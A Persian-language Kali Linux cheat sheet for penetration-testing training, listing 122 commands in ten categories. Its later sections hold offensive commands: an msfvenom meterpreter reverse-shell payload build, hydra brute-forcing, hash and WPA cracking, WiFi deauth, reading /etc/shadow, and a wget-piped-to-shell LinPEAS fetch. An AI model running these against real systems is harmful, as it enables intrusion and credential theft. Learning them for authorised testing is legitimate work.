دستورات کالی لینوکس
این صفحه یک چیتشیت کامل از دستورهای پرکاربرد کالی لینوکس برای هک اخلاقی و تست نفوذ است: ۱۲۲ دستور در ۱۰ دسته، از مبانی لینوکس و شبکه تا شناسایی، اسکن و ابزارهای امنیتی. هر دستور یک توضیح کوتاه فارسی و دکمهی کپی دارد و میتوانی با کادر جستجو سریع هر چیزی را که میخواهی پیدا کنی.
به فینگلیش: dastoorat kali linux، kali linux commands farsi، cheat sheet kali linux، dastoorat linux baraye hack

۱۲۲ دستور در ۱۰ دسته
مبانی لینوکس
pwdنمایش مسیر پوشهی فعلی
ls -laلیست همهی فایلها با جزئیات و فایلهای مخفی
cd /path/to/dirتغییر پوشه
cp -r src destکپی فایل/پوشه بهصورت بازگشتی
mv old newجابجایی یا تغییر نام فایل
rm -rf dirحذف پوشه و محتوایش (با احتیاط!)
mkdir -p a/b/cساخت پوشههای تودرتو
cat file.txtنمایش محتوای فایل
less file.txtمشاهدهی فایل صفحهبهصفحه
head -n 20 fileنمایش ۲۰ خط اول
tail -f /var/log/syslogدنبال کردن زندهی فایل لاگ
grep -rin 'pattern' .جستجوی بازگشتی متن بدون حساسیت به حروف
find / -name '*.conf' 2>/dev/nullیافتن فایلها بر اساس نام
chmod +x script.shقابلاجرا کردن فایل
chmod 600 id_rsaدسترسی فقط برای مالک
chown user:group fileتغییر مالک و گروه فایل
historyنمایش تاریخچهی دستورات
man commandخواندن راهنمای دستور
which nmapیافتن مسیر یک برنامه
df -hنمایش فضای دیسک
du -sh *حجم هر مورد در پوشه
سیستم و پردازشها
ps auxلیست همهی پردازشهای در حال اجرا
topنمایش زندهی پردازشها و CPU
htopنمایشگر تعاملی پردازشها
kill -9 PIDبستن اجباری پردازش با PID
killall firefoxبستن پردازشها بر اساس نام
jobsلیست کارهای پسزمینه
bg / fgارسال کار به پسزمینه/پیشزمینه
uname -aاطلاعات کرنل و سیستم
whoamiنمایش نام کاربر فعلی
idنمایش شناسهی کاربر و گروه
sudo suتبدیل به کاربر روت
crontab -lلیست کارهای زمانبندیشده
systemctl status sshبررسی وضعیت سرویس
envنمایش متغیرهای محیطی
شبکه
ip aنمایش کارتهای شبکه و IPها
ifconfigنمایش تنظیمات کارت شبکه (قدیمی)
ping -c 4 targetارسال ۴ بستهی پینگ
traceroute targetردیابی مسیر بستهها
netstat -tulpnلیست پورتهای باز و پردازشها
ss -tulpnلیست سوکتها و پورتها (مدرن)
dig example.comاستعلام DNS
nslookup example.comپرسوجوی رکوردهای DNS
host -t mx example.comاستعلام رکوردهای ایمیل
whois example.comاطلاعات ثبت دامنه
curl -I https://siteدریافت فقط هدرهای HTTP
curl -s https://site | lessدریافت بیصدای یک صفحه
wget https://site/fileدانلود یک فایل
arp -aنمایش جدول ARP
route -nنمایش جدول مسیریابی
tcpdump -i eth0 -nضبط بستهها روی یک کارت شبکه
nc -lvnp 4444شنوندهی netcat روی پورت ۴۴۴۴
nc target 80اتصال به یک پورت با netcat
ssh user@hostاتصال SSH به میزبان راه دور
scp file user@host:/tmpکپی فایل از طریق SSH
شناسایی و اسکن
nmap -sn 192.168.1.0/24شناسایی میزبانهای زنده در یک شبکه
nmap -sV targetتشخیص نسخهی سرویسها
nmap -sC -sV targetاسکن با اسکریپتهای پیشفرض و نسخه
nmap -p- targetاسکن تمام ۶۵۵۳۵ پورت TCP
nmap -sU targetاسکن پورتهای UDP
nmap -A targetاسکن تهاجمی (سیستمعامل، نسخه، اسکریپت)
nmap -O targetتشخیص سیستمعامل
nmap --script vuln targetاجرای اسکریپتهای آسیبپذیری
masscan -p1-65535 target --rate 1000اسکنر پورت بسیار سریع
whatweb https://siteشناسایی فناوریهای وبسایت
theHarvester -d example.com -b allجمعآوری ایمیل و سابدامین (OSINT)
dnsrecon -d example.comشمارش رکوردهای DNS
sublist3r -d example.comشمارش سابدامینها
amass enum -d example.comشمارش عمیق سابدامینها
تست امنیت وب
gobuster dir -u https://site -w wordlist.txtحدس پوشههای وب با wordlist
ffuf -u https://site/FUZZ -w wordlist.txtفازر سریع وب
nikto -h https://siteاسکن وبسرور برای مشکلات
wpscan --url https://siteاسکن سایت وردپرسی
sqlmap -u 'https://site?id=1' --batchتست خودکار تزریق SQL
sqlmap -u URL --dbsشمارش دیتابیسها با SQLi
curl -X POST -d 'a=b' https://siteارسال درخواست POST
wfuzz -w wordlist -d 'user=FUZZ' URLفاز کردن پارامترهای POST
dirb https://siteاسکنر کلاسیک محتوای وب
متااسپلویت
msfconsoleاجرای کنسول متااسپلویت
search type:exploit platform:windowsجستجوی ماژولها
use exploit/multi/handlerانتخاب یک ماژول
set RHOSTS targetتعیین میزبان هدف
set LHOST your_ipتعیین IP شنوندهی خودت
show optionsنمایش تنظیمات ماژول
exploitاجرای اکسپلویت
sessions -lلیست نشستهای فعال
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -f exe -o s.exeساخت یک پیلود
رمز عبور و هش
hydra -l admin -P rockyou.txt ssh://targetحملهی دیکشنری به ورود SSH
hydra -L users.txt -P pass.txt target http-post-form ...حمله به فرم ورود وب
john --wordlist=rockyou.txt hashes.txtشکستن هشها با John
john --show hashes.txtنمایش رمزهای شکستهشده
hashcat -m 0 -a 0 hashes.txt rockyou.txtشکستن هش MD5 با hashcat
hashid hashتشخیص نوع هش
hash-identifierشناساگر تعاملی هش
crunch 8 8 -o list.txtساخت لیست کلمات عبور
cewl https://site -w words.txtساخت wordlist از یک سایت
وایرلس و وایفای
iwconfigنمایش اطلاعات کارت وایرلس
airmon-ng start wlan0فعالسازی حالت مانیتور
airodump-ng wlan0monاسکن شبکههای وایفای اطراف
airodump-ng -c 6 --bssid MAC -w cap wlan0monضبط هَندشیک روی یک کانال
aireplay-ng --deauth 10 -a MAC wlan0monارسال بستههای deauth
aircrack-ng cap.cap -w rockyou.txtشکستن هَندشیک WPA
wash -i wlan0monیافتن اکسسپوینتهای دارای WPS
پس از نفوذ و ارتقای دسترسی
sudo -lلیست دسترسیهای sudo کاربر فعلی
find / -perm -4000 2>/dev/nullیافتن فایلهای SUID برای بالا بردن دسترسی
cat /etc/passwdلیست کاربران سیستم
cat /etc/shadowهش رمزهای عبور (فقط روت)
uname -rنسخهی کرنل (برای اکسپلویت)
wget http://ip/linpeas.sh -O- | shاجرای اسکنر ارتقای دسترسی LinPEAS
python3 -c 'import pty;pty.spawn("/bin/bash")'ارتقای شل به TTY کامل
python3 -m http.server 8000اشتراک سریع فایلها روی HTTP
base64 -d fileرمزگشایی دادهی base64
گیت و ابزارهای متفرقه
git clone https://repo.gitکلون کردن یک ریپازیتوری
git log --onelineتاریخچهی فشردهی کامیتها
tar -xzvf file.tar.gzاستخراج آرشیو .tar.gz
zip -r out.zip folderفشردهسازی پوشه به zip
md5sum fileمحاسبهی چکسام MD5
sha256sum fileمحاسبهی چکسام SHA-256
openssl s_client -connect site:443بررسی گواهی TLS
watch -n1 'command'اجرای مکرر دستور هر ثانیه
xxd file | headنمایش هگز فایل
strings binaryاستخراج متن از فایل باینری
میخواهی این دستورها را عمیقتر یاد بگیری؟
این چیتشیت مرجع سریع است. برای یادگیری قدمبهقدم، مقاله و سرفصل زیر را ببین.
سؤالهای پرتکرار
دستورات کالی لینوکس را از کجا شروع کنم؟
از دستهی «مبانی لینوکس» شروع کن: حرکت بین پوشهها، دیدن و ویرایش فایل، دسترسیها و جستجو. وقتی با ترمینال راحت شدی، سراغ شبکه، شناسایی و اسکن برو. همهی این دستورها استاندارد و آموزشیاند و روی هر توزیع لینوکس هم کار میکنند.
آیا کار با این دستورها قانونی است؟
خود دستورها ابزارند و یادگیریشان کاملاً قانونی است. اما اسکن، شکستن رمز یا بهرهبرداری فقط روی سیستم خودت یا هدفی مجاز است که صاحبش کتبی اجازه داده باشد. روی سیستم دیگران بدون اجازه، جرم است.
این دستورها فقط برای کالی لینوکساند؟
نه. بیشترشان دستورهای استاندارد لینوکس و ابزارهای متنبازند که روی اوبونتو، دبیان و توزیعهای دیگر هم اجرا میشوند. کالی فقط این ابزارها را از پیش نصبشده دارد، برای همین برای تمرین راحتتر است.
چطور یک دستور را سریع پیدا کنم؟
از کادر جستجوی بالای صفحه استفاده کن؛ میتوانی هم نام دستور (مثلاً nmap) و هم بخشی از توضیح فارسی را تایپ کنی. با دکمهی «کپی» کنار هر دستور هم میتوانی آن را مستقیم در ترمینال بچسبانی.
آمادهای این دستورها را در یک مسیر عملی و قدمبهقدم یاد بگیری؟ دورهها و کارگاههای هک اخلاقی و امنیت سایبری را ببین.
دیدن دورهها